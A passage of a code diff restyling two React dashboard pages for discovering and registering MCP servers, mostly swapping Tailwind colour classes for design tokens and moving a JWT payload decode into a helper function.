+          <span className="text-sm text-ink-secondary">Filter:</span>
           <div className="flex items-center gap-1">
             <button
               onClick={() => setFilter("all")}
-              className={`px-3 py-1 text-sm rounded-md transition-colors ${
+              className={`px-3 py-1 text-sm rounded-pill transition-colors ${
                 filter === "all"
-                  ? "bg-blue-600 text-white"
-                  : "bg-gray-100 dark:bg-gray-700 text-gray-700 dark:text-gray-300 hover:bg-gray-200 dark:hover:bg-gray-600"
+                  ? "bg-brand text-white shadow-glow"
+                  : "bg-glass-inset-gray text-ink-body hover:bg-glass-inset"
               }`}
             >
               All
             </button>
             <button
               onClick={() => setFilter("unmapped")}
-              className={`px-3 py-1 text-sm rounded-md transition-colors ${
+              className={`px-3 py-1 text-sm rounded-pill transition-colors ${
                 filter === "unmapped"
-                  ? "bg-orange-600 text-white"
-                  : "bg-gray-100 dark:bg-gray-700 text-gray-700 dark:text-gray-300 hover:bg-gray-200 dark:hover:bg-gray-600"
+                  ? "bg-warning-fill text-warning-text"
+                  : "bg-glass-inset-gray text-ink-body hover:bg-glass-inset"
               }`}
             >
               Unmapped
             </button>
             <button
               onClick={() => setFilter("mapped")}
-              className={`px-3 py-1 text-sm rounded-md transition-colors ${
+              className={`px-3 py-1 text-sm rounded-pill transition-colors ${
                 filter === "mapped"
-                  ? "bg-green-600 text-white"
-                  : "bg-gray-100 dark:bg-gray-700 text-gray-700 dark:text-gray-300 hover:bg-gray-200 dark:hover:bg-gray-600"
+                  ? "bg-success-fill text-success-text"
+                  : "bg-glass-inset-gray text-ink-body hover:bg-glass-inset"
               }`}
             >
               Mapped
@@ -281,16 +281,16 @@ export default function MCPDiscoveryPage() {
       </div>
 
       {/* Discovery Table */}
-      <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 overflow-hidden">
+      <div className="glass overflow-hidden">
         {!paginatedMCPs || filteredMCPs.length === 0 ? (
           <div className="flex flex-col items-center justify-center py-12">
-            <Server className="h-12 w-12 text-gray-300 dark:text-gray-600 mb-4" />
-            <p className="text-gray-500 dark:text-gray-400 text-sm font-medium">
+            <Server className="h-12 w-12 text-ink-tertiary mb-4" />
+            <p className="text-ink-secondary text-sm font-medium">
               {searchQuery || filter !== "all"
                 ? "No MCP servers match your filters"
                 : "No MCP servers discovered yet"}
             </p>
-            <p className="text-gray-400 dark:text-gray-500 text-xs mt-1">
+            <p className="text-ink-tertiary text-xs mt-1">
               {searchQuery || filter !== "all"
                 ? "Try adjusting your search or filter criteria"
                 : "MCP references in agent talks_to fields will appear here"}
@@ -299,57 +299,57 @@ export default function MCPDiscoveryPage() {
         ) : (
           <div className="overflow-x-auto">
             <table className="w-full">
-              <thead className="bg-gray-50 dark:bg-gray-900/50 border-b border-gray-200 dark:border-gray-700">
+              <thead className="bg-glass-inset-gray border-b border-divider">
                 <tr>
-                  <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
-                    MCP Name / URL
+                  <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase tracking-wider">
+                    MCP name / URL
                   </th>
-                  <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                  <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase tracking-wider">
                     Status
                   </th>
-                  <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
-                    Detected By
+                  <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase tracking-wider">
+                    Detected by
                   </th>
-                  <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
-                    Detection Method
+                  <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase tracking-wider">
+                    Detection method
                   </th>
-                  <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
-                    First Seen
+                  <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase tracking-wider">
+                    First seen
                   </th>
-                  <th className="px-4 py-3 text-right text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                  <th className="px-4 py-3 text-right text-xs font-medium text-ink-tertiary uppercase tracking-wider">
                     Actions
                   </th>
                 </tr>
               </thead>
-              <tbody className="divide-y divide-gray-200 dark:divide-gray-700">
+              <tbody className="divide-y divide-divider">
                 {paginatedMCPs.map((mcp, index) => (
                   <tr
                     key={index}
-                    className="hover:bg-gray-50 dark:hover:bg-gray-900/30 transition-colors"
+                    className="hover:bg-glass-inset-gray transition-colors"
                   >
                     <td className="px-4 py-4">
                       <div className="flex items-center gap-3">
                         <div
-                          className={`p-2 rounded-lg ${
+                          className={`p-2 rounded-inset-sm ${
                             mcp.isRegistered
-                              ? "bg-green-100 dark:bg-green-900/30"
-                              : "bg-orange-100 dark:bg-orange-900/30"
+                              ? "bg-success-fill"
+                              : "bg-warning-fill"
                           }`}
                         >
                           <Server
                             className={`h-4 w-4 ${
                               mcp.isRegistered
-                                ? "text-green-600 dark:text-green-400"
-                                : "text-orange-600 dark:text-orange-400"
+                                ? "text-success-text"
+                                : "text-warning-text"
                             }`}
                           />
                         </div>
                         <div>
-                          <p className="text-sm font-medium text-gray-900 dark:text-gray-100">
+                          <p className="text-sm font-medium text-ink">
                             {mcp.name}
                           </p>
                           {mcp.url && (
-                            <p className="text-xs text-gray-500 dark:text-gray-400 truncate max-w-xs">
+                            <p className="text-xs text-ink-tertiary truncate max-w-xs">
                               {mcp.url}
                             </p>
                           )}
@@ -358,12 +358,12 @@ export default function MCPDiscoveryPage() {
                     </td>
                     <td className="px-4 py-4">
                       {mcp.isRegistered ? (
-                        <span className="inline-flex items-center gap-1 px-2 py-1 rounded-full text-xs font-medium bg-green-100 dark:bg-green-900/30 text-green-700 dark:text-green-300">
+                        <span className="inline-flex items-center gap-1 px-2 py-1 rounded-pill text-xs font-medium border border-success-border bg-success-fill text-success-text">
                           <Check className="h-3 w-3" />
                           Registered
                         </span>
                       ) : (
-                        <span className="inline-flex items-center gap-1 px-2 py-1 rounded-full text-xs font-medium bg-orange-100 dark:bg-orange-900/30 text-orange-700 dark:text-orange-300">
+                        <span className="inline-flex items-center gap-1 px-2 py-1 rounded-pill text-xs font-medium border border-warning-border bg-warning-fill text-warning-text">
                           <AlertTriangle className="h-3 w-3" />
                           Unmapped
                         </span>
@@ -375,30 +375,30 @@ export default function MCPDiscoveryPage() {
                           {mcp.detectedBy.slice(0, 3).map((agent, i) => (
                             <div
                               key={i}
-                              className="w-6 h-6 rounded-full bg-blue-500 flex items-center justify-center text-[10px] text-white font-medium border-2 border-white dark:border-gray-800"
+                              className="w-6 h-6 rounded-full bg-brand flex items-center justify-center text-[10px] text-white font-medium border-2 border-glass-border"
                               title={agent}
                             >
                               {agent.charAt(0).toUpperCase()}
                             </div>
                           ))}
                           {mcp.detectedByCount > 3 && (
-                            <div className="w-6 h-6 rounded-full bg-gray-300 dark:bg-gray-600 flex items-center justify-center text-[10px] text-gray-700 dark:text-gray-300 font-medium border-2 border-white dark:border-gray-800">
+                            <div className="w-6 h-6 rounded-full bg-track flex items-center justify-center text-[10px] text-ink-body font-medium border-2 border-glass-border">
                               +{mcp.detectedByCount - 3}
                             </div>
                           )}
                         </div>
-                        <span className="text-xs text-gray-500 dark:text-gray-400">
+                        <span className="text-xs text-ink-tertiary">
                           {mcp.detectedByCount} agent{mcp.detectedByCount !== 1 ? "s" : ""}
                         </span>
                       </div>
                     </td>
                     <td className="px-4 py-4">
-                      <span className="text-xs text-gray-600 dark:text-gray-400 bg-gray-100 dark:bg-gray-700 px-2 py-1 rounded">
+                      <span className="text-xs text-ink-body bg-glass-inset-gray px-2 py-1 rounded-pill">
                         {mcp.detectionMethod}
                       </span>
                     </td>
                     <td className="px-4 py-4">
-                      <div className="flex items-center gap-1 text-xs text-gray-500 dark:text-gray-400">
+                      <div className="flex items-center gap-1 text-xs text-ink-tertiary">
                         <Clock className="h-3 w-3" />
                         {formatDate(mcp.firstDetectedAt)}
                       </div>
@@ -408,7 +408,7 @@ export default function MCPDiscoveryPage() {
                         {mcp.isRegistered && mcp.matchingServerId ? (
                           <Link
                             href={`/dashboard/mcp/${mcp.matchingServerId}`}
-                            className="inline-flex items-center gap-1 px-3 py-1 text-xs text-blue-600 dark:text-blue-400 hover:bg-blue-50 dark:hover:bg-blue-900/30 rounded-md transition-colors"
+                            className="inline-flex items-center gap-1 px-3 py-1 text-xs text-brand-text hover:bg-brand-soft rounded-pill transition-colors"
                           >
                             <Eye className="h-3 w-3" />
                             View
@@ -416,7 +416,7 @@ export default function MCPDiscoveryPage() {
                         ) : (
                           <Link
                             href={`/dashboard/mcp?register=${encodeURIComponent(mcp.name)}`}
-                            className="inline-flex items-center gap-1 px-3 py-1 text-xs bg-blue-600 text-white hover:bg-blue-700 rounded-md transition-colors"
+                            className="inline-flex items-center gap-1 px-3 py-1 text-xs bg-brand text-white shadow-glow hover:bg-brand-hover rounded-pill transition-colors"
                           >
                             <Plus className="h-3 w-3" />
                             Register
@@ -431,25 +431,25 @@ export default function MCPDiscoveryPage() {
 
             {/* Pagination Controls */}
             {filteredMCPs.length > 0 && (
-              <div className="flex items-center justify-between px-4 py-3 border-t border-gray-200 dark:border-gray-700">
-                <div className="text-sm text-gray-500 dark:text-gray-400">
+              <div className="flex items-center justify-between px-4 py-3 border-t border-divider">
+                <div className="text-sm text-ink-secondary">
                   Showing {Math.min(currentPage * PAGE_SIZE, filteredMCPs.length)} of {filteredMCPs.length} servers
                 </div>
                 <div className="flex items-center gap-2">
                   {currentPage > 1 && (
                     <button
                       onClick={() => setCurrentPage(1)}
-                      className="px-3 py-1 text-sm bg-gray-100 dark:bg-gray-700 text-gray-700 dark:text-gray-300 rounded-md hover:bg-gray-200 dark:hover:bg-gray-600 transition-colors"
+                      className="px-3 py-1 text-sm bg-glass-inset-gray text-ink-body rounded-pill hover:bg-glass-inset transition-colors"
                     >
-                      Show Less
+                      Show less
                     </button>
                   )}
                   {hasMore && (
                     <button
                       onClick={() => setCurrentPage(currentPage + 1)}
-                      className="px-3 py-1 text-sm bg-blue-600 text-white rounded-md hover:bg-blue-700 transition-colors"
+                      className="px-3 py-1 text-sm bg-brand text-white shadow-glow rounded-pill hover:bg-brand-hover transition-colors"
                     >
-                      Load More ({Math.min(PAGE_SIZE, filteredMCPs.length - currentPage * PAGE_SIZE)} more)
+                      Load more ({Math.min(PAGE_SIZE, filteredMCPs.length - currentPage * PAGE_SIZE)} more)
                     </button>
                   )}
                 </div>
@@ -460,17 +460,17 @@ export default function MCPDiscoveryPage() {
       </div>
 
       {/* Help Text */}
-      <div className="bg-blue-50 dark:bg-blue-900/20 rounded-lg border border-blue-200 dark:border-blue-800 p-4">
+      <div className="bg-brand-soft rounded-card border border-stroke p-4">
         <div className="flex items-start gap-3">
-          <div className="p-2 bg-blue-100 dark:bg-blue-900/50 rounded-lg">
-            <Server className="h-5 w-5 text-blue-600 dark:text-blue-400" />
+          <div className="p-2 bg-glass-inset rounded-inset-sm">
+            <Server className="h-5 w-5 text-brand-text" />
           </div>
           <div>
-            <h3 className="text-sm font-medium text-blue-900 dark:text-blue-100">
-              How MCP Discovery Works
+            <h3 className="text-sm font-medium text-ink">
+              How MCP discovery works
             </h3>
-            <p className="text-xs text-blue-700 dark:text-blue-300 mt-1">
-              AIM automatically detects MCP servers referenced in agent <code className="bg-blue-100 dark:bg-blue-800 px-1 rounded">talks_to</code> fields.
+            <p className="text-xs text-ink-body mt-1">
+              AIM automatically detects MCP servers referenced in agent <code className="bg-glass-inset text-ink px-1 rounded">talks_to</code> fields.
               Unmapped MCPs represent servers that agents communicate with but haven't been formally registered in your organization.
               Registering these servers enables proper governance, trust scoring, and attestation workflows.
             </p>

--- a/apps/web/app/dashboard/mcp/page.tsx
+++ b/apps/web/app/dashboard/mcp/page.tsx
@@ -1,6 +1,7 @@
 "use client";
 
 import { useState, useEffect, useMemo, useCallback } from "react";
+import { decodeJwtPayload } from "@/lib/jwt-payload";
 import { useRouter } from "next/navigation";
 import {
   Server,
@@ -60,26 +61,26 @@ interface MCPServer {
 
 function StatCard({ stat }: { stat: any }) {
   return (
-    <div className="bg-white dark:bg-gray-800 p-6 rounded-lg border border-gray-200 dark:border-gray-700 shadow-sm">
+    <div className="glass p-6">
       <div className="flex items-center">
         <div className="flex-shrink-0">
-          <stat.icon className="h-6 w-6 text-gray-400" />
+          <stat.icon className="h-6 w-6 text-ink-tertiary" />
         </div>
         <div className="ml-5 w-0 flex-1">
           <dl>
-            <dt className="text-sm font-medium text-gray-500 dark:text-gray-400 truncate">
+            <dt className="text-sm font-medium text-ink-secondary truncate">
               {stat.name}
             </dt>
             <dd className="flex items-baseline">
-              <div className="text-2xl font-semibold text-gray-900 dark:text-gray-100">
+              <div className="text-2xl font-semibold text-ink">
                 {stat.value}
               </div>
               {stat.change && (
                 <div
                   className={`ml-2 flex items-baseline text-sm font-semibold ${
                     stat.changeType === "positive"
-                      ? "text-green-600"
-                      : "text-red-600"
+                      ? "text-success-text"
+                      : "text-danger-text"
                   }`}
                 >
                   {stat.change}
@@ -97,22 +98,22 @@ function StatusBadge({ status }: { status: string }) {
   const getStatusStyles = (status: string) => {
     switch (status) {
       case "verified":
-        return "bg-green-100 dark:bg-green-900/30 text-green-800 dark:text-green-300";
+        return "bg-success-fill text-success-text border border-success-border";
       case "pending":
-        return "bg-yellow-100 dark:bg-yellow-900/30 text-yellow-800 dark:text-yellow-300";
+        return "bg-warning-fill text-warning-text border border-warning-border";
       case "suspended":
       case "revoked":
-        return "bg-red-100 dark:bg-red-900/30 text-red-800 dark:text-red-300";
+        return "bg-danger-fill text-danger-text border border-danger-border";
       case "inactive":
-        return "bg-gray-100 dark:bg-gray-700 text-gray-800 dark:text-gray-300";
+        return "bg-glass-inset-gray text-ink-secondary border border-stroke";
       default:
-        return "bg-gray-100 dark:bg-gray-700 text-gray-800 dark:text-gray-300";
+        return "bg-glass-inset-gray text-ink-secondary border border-stroke";
     }
   };
 
   return (
     <span
-      className={`inline-flex items-center px-2.5 py-0.5 rounded-full text-xs font-medium capitalize ${getStatusStyles(status)}`}
+      className={`inline-flex items-center px-2.5 py-0.5 rounded-pill text-xs font-medium capitalize ${getStatusStyles(status)}`}
     >
       {status}
     </span>
@@ -125,10 +126,10 @@ function MCPServersTableSkeleton() {
       {/* Header Skeleton */}
       <div className="flex items-center justify-between">
         <div className="space-y-2">
-          <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-8 w-40 rounded"></div>
-          <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-4 w-96 rounded"></div>
+          <div className="animate-pulse bg-track h-8 w-40 rounded"></div>
+          <div className="animate-pulse bg-track h-4 w-96 rounded"></div>
         </div>
-        <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-10 w-32 rounded-lg"></div>
+        <div className="animate-pulse bg-track h-10 w-32 rounded-lg"></div>
       </div>
 
       {/* Stats Cards Skeleton */}
@@ -136,18 +137,18 @@ function MCPServersTableSkeleton() {
         {[...Array(4)].map((_, i) => (
           <div
             key={i}
-            className="bg-white dark:bg-gray-800 p-6 rounded-lg border border-gray-200 dark:border-gray-700 shadow-sm"
+            className="glass p-6"
           >
             <div className="flex items-center">
               <div className="flex-shrink-0">
-                <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-6 w-6 rounded"></div>
+                <div className="animate-pulse bg-track h-6 w-6 rounded"></div>
               </div>
               <div className="ml-5 w-0 flex-1">
                 <div className="space-y-2">
-                  <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-4 w-24 rounded"></div>
+                  <div className="animate-pulse bg-track h-4 w-24 rounded"></div>
                   <div className="flex items-baseline gap-2">
-                    <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-8 w-16 rounded"></div>
-                    <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-4 w-12 rounded"></div>
+                    <div className="animate-pulse bg-track h-8 w-16 rounded"></div>
+                    <div className="animate-pulse bg-track h-4 w-12 rounded"></div>
                   </div>
                 </div>
               </div>
@@ -157,62 +158,62 @@ function MCPServersTableSkeleton() {
       </div>
 
       {/* Filters Skeleton */}
-      <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 shadow-sm p-4">
+      <div className="glass p-4">
         <div className="flex flex-col sm:flex-row gap-4">
-          <div className="animate-pulse bg-gray-200 dark:bg-gray-700 flex-1 h-10 rounded-lg"></div>
-          <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-10 w-40 rounded-lg"></div>
+          <div className="animate-pulse bg-track flex-1 h-10 rounded-lg"></div>
+          <div className="animate-pulse bg-track h-10 w-40 rounded-lg"></div>
         </div>
       </div>
 
       {/* Table Skeleton */}
-      <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 shadow-sm">
+      <div className="glass overflow-hidden">
         <div className="overflow-x-auto">
-          <table className="min-w-full divide-y divide-gray-200 dark:divide-gray-700">
-            <thead className="bg-gray-50 dark:bg-gray-800">
+          <table className="min-w-full divide-y divide-divider">
+            <thead className="bg-glass-inset-gray">
               <tr>
                 <th className="px-6 py-3">
-                  <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-4 w-24 rounded"></div>
+                  <div className="animate-pulse bg-track h-4 w-24 rounded"></div>
                 </th>
                 <th className="px-6 py-3">
-                  <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-4 w-16 rounded"></div>
+                  <div className="animate-pulse bg-track h-4 w-16 rounded"></div>
                 </th>
                 <th className="px-6 py-3">
-                  <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-4 w-16 rounded"></div>
+                  <div className="animate-pulse bg-track h-4 w-16 rounded"></div>
                 </th>
                 <th className="px-6 py-3">
-                  <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-4 w-24 rounded"></div>
+                  <div className="animate-pulse bg-track h-4 w-24 rounded"></div>
                 </th>
                 <th className="px-6 py-3">
-                  <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-4 w-16 rounded"></div>
+                  <div className="animate-pulse bg-track h-4 w-16 rounded"></div>
                 </th>
               </tr>
             </thead>
-            <tbody className="bg-white dark:bg-gray-900 divide-y divide-gray-200 dark:divide-gray-700">
+            <tbody className="divide-y divide-divider">
               {[...Array(5)].map((_, rowIndex) => (
                 <tr key={rowIndex}>
                   <td className="px-6 py-4">
                     <div className="flex items-center">
-                      <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-10 w-10 rounded-lg"></div>
+                      <div className="animate-pulse bg-track h-10 w-10 rounded-lg"></div>
                       <div className="ml-4 space-y-1">
-                        <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-4 w-32 rounded"></div>
-                        <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-3 w-20 rounded"></div>
+                        <div className="animate-pulse bg-track h-4 w-32 rounded"></div>
+                        <div className="animate-pulse bg-track h-3 w-20 rounded"></div>
                       </div>
                     </div>
                   </td>
                   <td className="px-6 py-4">
-                    <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-6 w-20 rounded-full"></div>
+                    <div className="animate-pulse bg-track h-6 w-20 rounded-full"></div>
                   </td>
                   <td className="px-6 py-4">
-                    <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-4 w-16 rounded"></div>
+                    <div className="animate-pulse bg-track h-4 w-16 rounded"></div>
                   </td>
                   <td className="px-6 py-4">
-                    <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-4 w-20 rounded"></div>
+                    <div className="animate-pulse bg-track h-4 w-20 rounded"></div>
                   </td>
                   <td className="px-6 py-4">
                     <div className="flex items-center gap-2">
-                      <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-6 w-6 rounded"></div>
-                      <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-6 w-6 rounded"></div>
-                      <div className="animate-pulse bg-gray-200 dark:bg-gray-700 h-6 w-6 rounded"></div>
+                      <div className="animate-pulse bg-track h-6 w-6 rounded"></div>
+                      <div className="animate-pulse bg-track h-6 w-6 rounded"></div>
+                      <div className="animate-pulse bg-track h-6 w-6 rounded"></div>
                     </div>
                   </td>
                 </tr>
@@ -235,14 +236,14 @@ function ErrorDisplay({
   return (
     <div className="flex items-center justify-center min-h-[400px]">
       <div className="flex flex-col items-center gap-4 max-w-md text-center">
-        <AlertCircle className="h-12 w-12 text-red-500" />
-        <h3 className="text-lg font-semibold text-gray-900 dark:text-gray-100">
-          Failed to Load MCP Servers
+        <AlertCircle className="h-12 w-12 text-danger-text" />
+        <h3 className="text-lg font-semibold text-ink">
+          Failed to load MCP servers
         </h3>
-        <p className="text-sm text-gray-500 dark:text-gray-400">{message}</p>
+        <p className="text-sm text-ink-secondary">{message}</p>
         <button
           onClick={onRetry}
-          className="px-4 py-2 bg-blue-600 text-white rounded-lg hover:bg-blue-700 transition-colors"
+          className="px-4 py-2 rounded-pill bg-brand text-white shadow-glow hover:bg-brand-hover transition-colors"
         >
           Retry
         </button>
@@ -275,7 +276,8 @@ export default function MCPServersPage() {
     const token = api.getToken?.();
     if (!token) return;
     try {
-      const payload = JSON.parse(atob(token.split(".")[1]));
+      const payload = decodeJwtPayload(token);
+      if (!payload) throw new Error("token payload is not decodable");
       const role = (payload.role as any) || "viewer";
       setUserRole(role);
     } catch {}
@@ -381,21 +383,21 @@ export default function MCPServersPage() {
 
   const statCards = [
     {
-      name: "Total MCP Servers",
+      name: "Total MCP servers",
       value: stats.total.toLocaleString(),
       // change: "+15.3%",
       // changeType: "positive",
       icon: Server,
     },
     {
-      name: "Active Servers",
+      name: "Active servers",
       value: stats.active.toLocaleString(),
       // change: "+8.7%",
       // changeType: "positive",
       icon: CheckCircle2,
     },
     {
-      name: "Avg Trust Score",
+      name: "Avg trust score",
       // Trust scores are on the canonical [0,1] scale, so the average is
       // rendered as a percentage. It used to print the raw value, which read
       // as "75.0" only because the backend was writing the literal 75.0 into
@@ -406,7 +408,7 @@ export default function MCPServersPage() {
       icon: Shield,
     },
     {
-      name: "Last Activity",
+      name: "Last activity",
       value: stats.lastActivity
         ? formatRelativeTime(stats.lastActivity)
         : "N/A",
@@ -504,10 +506,10 @@ export default function MCPServersPage() {
         {/* Header */}
         <div className="flex items-center justify-between">
         <div>
-          <h1 className="text-2xl font-bold text-gray-900 dark:text-white">
-            MCP Servers
+          <h1 className="text-2xl font-bold text-ink">
+            MCP servers
           </h1>
-          <p className="mt-1 text-sm text-gray-500 dark:text-gray-400">
+          <p className="mt-1 text-sm text-ink-secondary">
             Manage Model Context Protocol (MCP) servers and their cryptographic
             verification status.
           </p>
@@ -517,10 +519,10 @@ export default function MCPServersPage() {
             setEditingMCP(null);
             setShowRegisterModal(true);
           }}
-          className="flex items-center gap-2 px-4 py-2 bg-blue-600 text-white rounded-lg hover:bg-blue-700 transition-colors"
+          className="flex items-center gap-2 px-4 py-2 rounded-pill bg-brand text-white shadow-glow hover:bg-brand-hover transition-colors"
         >
           <Plus className="h-4 w-4" />
-          Register MCP Server
+          Register MCP server
         </button>
       </div>
 
@@ -532,26 +534,26 @@ export default function MCPServersPage() {
       </div>
 
       {/* Search and Filter */}
-      <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 shadow-sm p-4">
+      <div className="glass p-4">
         <div className="flex flex-col sm:flex-row gap-4">
           <div className="flex-1 relative">
-            <Search className="absolute left-3 top-1/2 transform -translate-y-1/2 h-4 w-4 text-gray-400" />
+            <Search className="absolute left-3 top-1/2 transform -translate-y-1/2 h-4 w-4 text-ink-tertiary" />
             <input
               type="text"
               placeholder="Search by name, URL, or ID..."
               value={searchTerm}
               onChange={(e) => setSearchTerm(e.target.value)}
-              className="w-full pl-10 pr-4 py-2 border border-gray-300 dark:border-gray-600 rounded-lg bg-white dark:bg-gray-900 text-gray-900 dark:text-gray-100 placeholder-gray-400 focus:outline-none focus:ring-2 focus:ring-blue-500 focus:border-transparent"
+              className="w-full pl-10 pr-4 py-2 border border-stroke rounded-inset-sm bg-glass-inset text-ink placeholder:text-ink-tertiary focus:outline-none focus:ring-2 focus:ring-brand focus:border-transparent"
             />
           </div>
           <div className="flex items-center gap-2">
-            <Filter className="h-4 w-4 text-gray-400" />
+            <Filter className="h-4 w-4 text-ink-tertiary" />
             <select
               value={statusFilter}
               onChange={(e) => setStatusFilter(e.target.value)}
-              className="px-4 py-2 border border-gray-300 dark:border-gray-600 rounded-lg bg-white dark:bg-gray-900 text-gray-900 dark:text-gray-100 focus:outline-none focus:ring-2 focus:ring-blue-500 focus:border-transparent"
+              className="px-4 py-2 border border-stroke rounded-inset-sm bg-glass-inset text-ink focus:outline-none focus:ring-2 focus:ring-brand focus:border-transparent"
             >
-              <option value="all">All Status</option>
+              <option value="all">All statuses</option>
               <option value="active">Active</option>
               <option value="inactive">Inactive</option>
               <option value="pending">Pending</option>
@@ -559,53 +561,53 @@ export default function MCPServersPage() {
           </div>
         </div>
         {searchTerm && (
-          <div className="mt-2 text-sm text-gray-500 dark:text-gray-400">
+          <div className="mt-2 text-sm text-ink-secondary">
             Found {filteredServers.length} of {mcpServers.length} servers
           </div>
         )}
       </div>
 
       {/* MCP Servers Table */}
-      <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 shadow-sm">
+      <div className="glass overflow-hidden">
         <div className="overflow-x-auto">
-          <table className="min-w-full divide-y divide-gray-200 dark:divide-gray-700">
-            <thead className="bg-gray-50 dark:bg-gray-800">
+          <table className="min-w-full divide-y divide-divider">
+            <thead className="bg-glass-inset-gray">
               <tr>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
                   Name
                 </th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
                   Endpoint
                 </th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
                   Status
                 </th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
                   Verified
                 </th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
                   Actions
                 </th>
               </tr>
             </thead>
-            <tbody className="bg-white dark:bg-gray-900 divide-y divide-gray-200 dark:divide-gray-700">
+            <tbody className="divide-y divide-divider">
               {paginatedServers.map((server) => (
                 <tr
                   key={server?.id}
-                  className="hover:bg-gray-50 dark:hover:bg-gray-800 transition-colors cursor-pointer"
+                  className="hover:bg-glass-inset-gray transition-colors cursor-pointer"
                   onClick={() => handleViewMCP(server)}
                 >
                   <td className="px-4 py-3 whitespace-nowrap">
                     <div className="flex items-center">
-                      <div className="flex-shrink-0 h-8 w-8 bg-purple-100 dark:bg-purple-900/30 rounded-lg flex items-center justify-center">
-                        <Server className="h-4 w-4 text-purple-600 dark:text-purple-400" />
+                      <div className="flex-shrink-0 h-8 w-8 bg-brand-soft rounded-lg flex items-center justify-center">
+                        <Server className="h-4 w-4 text-brand-text" />
                       </div>
                       <div className="ml-3">
-                        <div className="text-sm font-medium text-gray-900 dark:text-gray-100">
+                        <div className="text-sm font-medium text-ink">
                           {server?.name}
                         </div>
                         <div
-                          className="text-xs text-gray-500 dark:text-gray-400"
+                          className="text-xs text-ink-secondary"
                           title={server?.id}
                         >
                           {server?.id?.substring(0, 8)}...
@@ -614,13 +616,13 @@ export default function MCPServersPage() {
                     </div>
                   </td>
                   <td className="px-4 py-3">
-                    <div className="flex items-center text-sm text-gray-900 dark:text-gray-100">
-                      <Globe className="h-3 w-3 mr-1 text-gray-400 flex-shrink-0" />
+                    <div className="flex items-center text-sm text-ink">
+                      <Globe className="h-3 w-3 mr-1 text-ink-tertiary flex-shrink-0" />
                       <a
                         href={server?.url}
                         target="_blank"
                         rel="noopener noreferrer"
-                        className="truncate max-w-[200px] hover:text-blue-600 dark:hover:text-blue-400 hover:underline transition-colors text-xs"
+                        className="truncate max-w-[200px] hover:text-brand-text hover:underline transition-colors text-xs"
                         title={server?.url}
                         onClick={(e) => e.stopPropagation()}
                       >
@@ -634,22 +636,22 @@ export default function MCPServersPage() {
                   <td className="px-4 py-3 whitespace-nowrap">
                     {server?.lastVerifiedAt ? (
                       <div className="flex items-center gap-2">
-                        <CheckCircle2 className="h-4 w-4 text-green-600 dark:text-green-400" />
-                        <span className="text-sm text-gray-900 dark:text-gray-100">
+                        <CheckCircle2 className="h-4 w-4 text-success-text" />
+                        <span className="text-sm text-ink">
                           {formatRelativeTime(server.lastVerifiedAt)}
                         </span>
                       </div>
                     ) : server?.status === "verified" ? (
                       <div className="flex items-center gap-2">
-                        <CheckCircle2 className="h-4 w-4 text-green-600 dark:text-green-400" />
-                        <span className="text-sm text-gray-900 dark:text-gray-100">
+                        <CheckCircle2 className="h-4 w-4 text-success-text" />
+                        <span className="text-sm text-ink">
                           Via Attestation
                         </span>
                       </div>
                     ) : (
                       <div className="flex items-center gap-2">
-                        <XCircle className="h-4 w-4 text-gray-400" />
-                        <span className="text-sm text-gray-500 dark:text-gray-400">
+                        <XCircle className="h-4 w-4 text-ink-tertiary" />
